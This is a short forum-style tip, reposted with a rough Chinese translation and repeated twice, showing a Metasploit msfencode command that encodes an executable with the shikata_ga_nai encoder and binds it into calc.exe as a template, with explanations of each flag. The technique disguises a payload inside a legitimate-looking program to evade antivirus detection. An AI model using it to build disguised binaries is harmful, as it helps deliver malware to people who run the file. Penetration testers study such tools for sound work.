author:MartinBishop edit:Samael from:Backtrack Forums //这一行是作者信息,不多说
use this command: 只用这个命令
msfencode -l
msfencode -i /root/Desktop/daten/myfile.exe -e x86/shikata_ga_nai -x /root/Desktop/daten/calc.exe -k -o /root/Desktop/daten/myNEWfile.exe
when i got it right then is -i my file which i want to encode, -e which encoder i wanna use, -x describes what other process will be spawned and -o is just the output file.
我在参数-i 后面加上我想要去面纱的文件,再-e后面跟上我想要使用的encode子啊-x后面描述一个我想要用来催生新文件的文件,再-k -o后面更上我想要输出的文件的名字和路径
use this command: 只用这个命令
msfencode -l
msfencode -i /root/Desktop/daten/myfile.exe -e x86/shikata_ga_nai -x /root/Desktop/daten/calc.exe -k -o /root/Desktop/daten/myNEWfile.exe
when i got it right then is -i my file which i want to encode, -e which encoder i wanna use, -x describes what other process will be spawned and -o is just the output file.
我在参数-i 后面加上我想要去面纱的文件,再-e后面跟上我想要使用的encode子啊-x后面描述一个我想要用来催生新文件的文件,再-k -o后面更上我想要输出的文件的名字和路径